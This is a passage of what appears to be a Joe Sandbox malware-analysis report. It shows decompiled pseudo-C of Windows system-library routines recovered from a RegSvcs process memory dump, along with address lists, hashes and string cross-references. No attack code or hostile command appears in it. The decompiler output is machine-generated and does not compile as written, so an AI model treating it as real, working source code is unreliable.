						_t88 = E0194500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01909860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x019451be
0x019451c3
0x019451c8
0x019451cd
0x019451d0
0x019451d3
0x019451d8
0x019451db
0x019451de
0x019451e0
0x019451e3
0x019451e6
0x019451e8
0x01945342
0x01945351
0x01945356
0x0194535a
0x01945360
0x01945363
0x01945366
0x01945369
0x01945369
0x0194536b
0x0194536b
0x01945370
0x019453a3
0x019453a4
0x019453a6
0x019453ab
0x019453ab
0x019453ae
0x019453ae
0x019453b5
0x019453bf
0x019453bf
0x01945375
0x01945396
0x019453a0
0x019453a0
0x00000000
0x01945396
0x01945377
0x01945379
0x0194537f
0x0194538c
0x01945390
0x00000000
0x01945390
0x019451ee
0x019451f1
0x01945301
0x01945310
0x01945315
0x01945318
0x0194531b
0x01945320
0x0194532e
0x01945331
0x00000000
0x01945331
0x01945328
0x01945329
0x00000000
0x01945329
0x019451fa
0x01945235
0x01945236
0x01945239
0x0194523f
0x01945240
0x01945241
0x01945242
0x01945246
0x01945247
0x0194524e
0x01945251
0x01945267
0x01945269
0x0194526e
0x0194527d
0x0194527e
0x01945281
0x01945282
0x01945287
0x01945288
0x0194528a
0x0194528f
0x01945294
0x00000000
0x00000000
0x0194529a
0x0194529c
0x0194529e
0x0194529e
0x019452a4
0x019452b0
0x00000000
0x00000000
0x019452ba
0x019452bc
0x019452bc
0x019452d4
0x019452d9
0x019452dc
0x019452e1
0x00000000
0x00000000
0x019452e7
0x019452f4
0x00000000
0x019452f4
0x01945270
0x00000000
0x01945270
0x019451fc
0x019451fd
0x01945202
0x01945203
0x01945205
0x0194520a
0x0194520f
0x00000000
0x00000000
0x0194521b
0x01945226
0x0194522b
0x0194521d
0x0194521d
0x01945222
0x01945222
0x0194522d
0x00000000

Strings

Legacy, xrefs: 01945226
UEFI, xrefs: 0194521D

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: b61a574ba6bf4e8d2f4614e3235357e1317f049177985d4d528e48249b9ed711
Instruction ID: b10fb3742a5501fda3036a8c235564f87aec120a533d8e2e06ca53c6d6d9e6f8
Opcode Fuzzy Hash: b61a574ba6bf4e8d2f4614e3235357e1317f049177985d4d528e48249b9ed711
Instruction Fuzzy Hash: E1516B71A00609DFEB25DFA8C880EAEBBF8FF48700F15446EE649EB291D6719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 018DD5E0 Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E018DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x19bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E018D6600(0x19b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x19b7b9c; // 0x0
							_t281 = L018E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0190F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x19b7b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x19b7b8c; // 0x1392a88
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E018E2280(_t200, 0x19b84d8);
									_t277 =  *0x19b85f4; // 0x1392f78
									_t351 =  *0x19b85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1392f10
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E018DFFB0(_t287, _t353, 0x19b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0191CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E018D6600(0x19b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E018D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x19bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0194E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x19b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x19bb218; // 0x0
														asm("ror edi, cl");
														 *0x19bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E018E2280(_t250, 0x19b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01903898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E018DFFB0(_t293, _t353, 0x19b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E019037F5(_t353, 0);
																}
																E01900413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E018F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E018F02D6(_t174);
																}
																L018E77F0( *0x19b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E018FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L018DEC7F(_t353);
										L018F19B8(_t287, 0, _t353, 0);
										_t200 = E018CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0190B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x19bb2f8; // 0x0
									if((_t206 |  *0x19bb2fc) == 0 || ( *0x19bb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x19bb2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01976B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01976AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E018DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L018DEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E01909730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E018DE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L018D8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01903C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x018dd5f2
0x018dd5f5
0x018dd5f5
0x018dd5fd
0x018dd600
0x018dd60a
0x018dd60d
0x018dd617
0x018dd61d
0x018dd627
0x018dd62e
0x018dd911
0x018dd913
0x00000000
0x018dd919
0x018dd919
0x018dd919
0x018dd634
0x018dd634
0x018dd634
0x018dd634
0x018dd640
0x018dd8bf
0x00000000
0x018dd646
0x018dd646
0x018dd64d
0x018dd652
0x0192b2fc
0x0192b2fc
0x0192b302
0x0192b33b
0x0192b341
0x00000000
0x0192b304
0x0192b304
0x0192b319
0x0192b31e
0x0192b324
0x0192b326
0x0192b332
0x0192b347
0x0192b34c
0x0192b351
0x0192b35a
0x00000000
0x0192b328
0x0192b328
0x00000000
0x0192b328
0x0192b326
0x018dd658
0x018dd658
0x018dd65b
0x018dd665
0x00000000
0x018dd66b
0x018dd66b
0x018dd66b
0x018dd66b
0x018dd66d
0x018dd672
0x018dd67a
0x00000000
0x00000000
0x018dd680
0x018dd686
0x018dd8ce
0x018dd8d4
0x018dd8dd
0x018dd8e0
0x018dd68c
0x018dd691
0x018dd69d
0x018dd6a2
0x018dd6a7
0x018dd6b0
0x018dd6b5
0x018dd6e0
0x018dd6b7
0x018dd6b7
0x018dd6b9
0x018dd6b9
0x018dd6bb
0x018dd6bd
0x018dd6ce
0x018dd6d0
0x018dd6d2
0x0192b363
0x0192b365
0x00000000
0x0192b36b
0x00000000
0x0192b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x018dd6bf
0x018dd6bf
0x018dd6e5
0x018dd6e7
0x018dd6e9
0x018dd6ec
0x018dd6ec
0x018dd6ef
0x018dd6f5
0x018dd6f9
0x018dd6fb
0x018dd6fd
0x018dd701
0x018dd703
0x018dd70a
0x018dd70a
0x018dd701
0x018dd710
0x018dd710
0x018dd6c1
0x018dd6c1
0x018dd6c6
0x0192b36d
0x0192b36f
0x00000000
0x0192b375
0x0192b375
0x0192b375
0x00000000
0x0192b375
0x00000000
0x018dd6cc
0x018dd6d8
0x018dd6d8
0x018dd6d8
0x00000000
0x018dd6c6
0x018dd6bf
0x00000000
0x018dd6da
0x018dd6da
0x018dd716
0x018dd71b
0x018dd720
0x018dd726
0x018dd726
0x018dd72d
0x00000000
0x018dd733
0x018dd739
0x018dd742
0x018dd750
0x018dd758
0x018dd764
0x018dd776
0x018dd77a
0x018dd783
0x018dd928
0x018dd92c
0x018dd93d
0x018dd944
0x018dd94f
0x018dd954
0x018dd956
0x018dd95f
0x018dd961
0x018dd973
0x018dd973
0x018dd956
0x018dd944
0x018dd92c
0x018dd78b
0x0192b394
0x018dd791
0x018dd798
0x0192b3a3
0x0192b3bb
0x0192b3bb
0x018dd7a5
0x018dd866
0x018dd870
0x018dd884
0x018dd892
0x018dd898
0x018dd89e
0x018dd8a0
0x018dd8a6
0x018dd8ac
0x018dd8ae
0x018dd8b4
0x018dd8b4
0x018dd8ae
0x018dd7a5
0x018dd78b
0x018dd7b1
0x0192b3c5
0x0192b3c5
0x018dd7c3
0x018dd7ca
0x018dd7e5
0x018dd7eb
0x018dd8eb
0x018dd8ed
0x00000000
0x018dd8f3
0x018dd8f3
0x018dd8f3
0x00000000
0x018dd8ed
0x018dd7cc
0x018dd7cc
0x018dd7d2
0x00000000
0x018dd7d4
0x018dd7d4
0x018dd7d7
0x018dd7df
0x0192b3d4
0x0192b3d9
0x0192b3dc
0x0192b3dc
0x0192b3df
0x0192b3e2
0x0192b468
0x0192b46d
0x0192b46f
0x0192b46f
0x0192b475
0x018dd8f8
0x018dd8f9
0x018dd8fd
0x0192b3e8
0x0192b3e8
0x0192b3eb
0x0192b3ed
0x00000000
0x0192b3ef
0x0192b3ef
0x0192b3f1
0x0192b3f4
0x0192b3fe
0x0192b404
0x0192b409
0x0192b40e
0x0192b410
0x0192b410
0x0192b414
0x0192b414
0x0192b41b
0x0192b420
0x0192b423
0x0192b425
0x0192b427
0x0192b42a
0x0192b42d
0x0192b42d
0x0192b42a
0x0192b432
0x0192b436
0x0192b438
0x0192b43b
0x0192b43b
0x0192b449
0x0192b44e
0x0192b454
0x0192b458
0x0192b458
0x0192b45d
0x00000000
0x0192b45d
0x0192b3ed
0x00000000
0x00000000
0x00000000
0x018dd7df
0x018dd7d2
0x018dd7ca
0x0192b37c
0x0192b37e
0x0192b385
0x0192b38a
0x00000000
0x0192b38a
0x018dd742
0x018dd7f1
0x018dd7f8
0x0192b49b
0x0192b49b
0x018dd800
0x018dd837
0x018dd843
0x018dd845
0x018dd847
0x018dd84a
0x018dd84b
0x018dd84e
0x018dd857
0x018dd802
0x018dd802
0x018dd80d
0x00000000
0x018dd818
0x018dd818
0x018dd824
0x018dd831
0x0192b4a5
0x0192b4ab
0x0192b4b3
0x0192b4b8
0x0192b4bb
0x00000000
0x0192b4c1
0x0192b4c1
0x0192b4c8
0x00000000
0x0192b4ce
0x0192b4d4
0x0192b4e1
0x0192b4e3
0x0192b4e5
0x00000000
0x0192b4eb
0x0192b4f0
0x0192b4f2
0x018ddac9
0x018ddacc
0x018ddacf
0x018ddad1
0x018ddd78
0x018ddd78
0x018ddcf2
0x00000000
0x018ddad7
0x018ddad9
0x018ddadb
0x00000000
0x00000000
0x018ddae1
0x018ddae1
0x018ddae4
0x018ddae6
0x0192b4f9
0x0192b4f9
0x0192b500
0x018ddaec
0x018ddaec
0x018ddaf5
0x018ddaf8
0x018ddafb
0x018ddb03
0x018ddb11
0x018ddb16
0x018ddb19
0x018ddb1b
0x0192b52c
0x0192b531
0x0192b534
0x018ddb21
0x018ddb21
0x018ddb24
0x018ddcd9
0x018ddce2
0x018ddce5
0x018ddd6a
0x018ddd6d
0x00000000
0x018ddd73
0x0192b51a
0x0192b51c
0x0192b51f
0x0192b524
0x00000000
0x0192b524
0x018ddce7
0x018ddce7
0x018ddce7
0x00000000
0x018ddce7
0x00000000
0x018ddb2a
0x018ddb2c
0x018ddb31
0x018ddb33
0x018ddb36
0x018ddb39
0x018ddb3b
0x018ddb66
0x018ddb66
0x018ddb3d
0x018ddb3d
0x018ddb3e
0x018ddb46
0x018ddb47
0x018ddb49
0x018ddb4c
0x018ddb53
0x018ddb55
0x018ddb58
0x018ddb5a
0x0192b50a
0x0192b50f
0x0192b512
0x018ddb60
0x018ddb60
0x018ddb63
0x018ddb63
0x00000000
0x018ddb63
0x018ddb5a
0x018ddb3b
0x018ddb24
0x018ddb69
0x018ddb69
0x018ddb6c
0x018ddb6f
0x018ddb74
0x0192b557
0x0192b557
0x0192b55e
0x018ddb7a
0x018ddb7c
0x018ddb7f
0x018ddb82
0x018ddb85
0x00000000
0x018ddb8b
0x018ddb8b
0x018ddb8d
0x018ddb9b
0x018ddb9b
0x018ddb9d
0x018ddba0
0x018ddba2
0x018ddba4
0x018ddba7
0x018ddba9
0x018ddbae
0x018ddbae
0x018ddbb1
0x018ddbb4
0x018ddbb4
0x018ddbb7
0x018ddbba
0x018ddcd2
0x018ddcd4
0x00000000
0x018ddbc0
0x018ddbc0
0x018ddbd2
0x018ddbd7
0x018ddbda
0x018ddbdd
0x018ddbdf
0x00000000
0x018ddbe5
0x018ddbe5
0x018ddbee
0x018ddbf1
0x0192b541
0x0192b544
0x00000000
0x0192b546
0x0192b546
0x00000000
0x0192b546
0x018ddbf7
0x018ddbf7
0x018ddbfd
0x018ddbfd
0x018ddbff
0x018ddc0b
0x018ddc15
0x018ddc1b
0x018ddc1d
0x018ddc21
0x018ddc21
0x018ddc23
0x018ddc23
0x018ddc26
0x018ddc29
0x018ddc2b
0x00000000
0x00000000
0x018ddc31
0x018ddc34
0x018ddc36
0x018ddcbf
0x018ddcbf
0x018ddcc2
0x00000000
0x018ddc3c
0x018ddc41
0x018ddc43
0x00000000
0x018ddc45
0x018ddc45
0x018ddc47
0x00000000
0x018ddc4d
0x018ddc4d
0x018ddc50
0x018ddc52
0x018ddc55
0x018ddcfa
0x018ddcfe
0x018ddd08
0x018ddd0a
0x018ddd0c
0x00000000
0x018ddd12
0x018ddd15
0x018ddd2d
0x018ddd2f
0x018ddd32
0x018ddd35
0x00000000
0x018ddd35
0x018ddc5b
0x018ddc5b
0x018ddc5e
0x018ddc61
0x018ddc64
0x018ddc67
0x018ddc67
0x018ddc6a
0x018ddc6c
0x018ddc8e
0x018ddc8e
0x018ddc91
0x018ddc93
0x018ddcce
0x018ddcce
0x018ddc95
0x018ddc9c
0x018ddc6e
0x018ddc72
0x018ddc75
0x018ddc77
0x018ddc79
0x0192b551
0x0192b551
0x00000000
0x018ddc7f
0x018ddc7f
0x018ddc81
0x00000000
0x018ddc83
0x018ddc86
0x018ddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x018ddc88
0x018ddc81
0x018ddc79
0x018ddc6c
0x018ddc55
0x018ddc47
0x018ddc43
0x00000000
0x018ddc36
0x018ddc23
0x00000000
0x018ddbff
0x018ddbf1
0x018ddbdf
0x018ddb8f
0x018ddb92
0x018ddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x018ddb95
0x018ddb8d
0x018ddb85
0x018ddb74
0x018ddc9f
0x018ddca2
0x018ddcb0
0x018ddcb0
0x018ddad1
0x0192b4e5
0x0192b4c8
0x00000000
0x00000000
0x00000000
0x018dd831
0x018dd80d
0x00000000
0x018dd800
0x0192b47f
0x0192b485
0x00000000
0x0192b485
0x018dd665
0x018dd652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 018DD898

Memory Dump Source

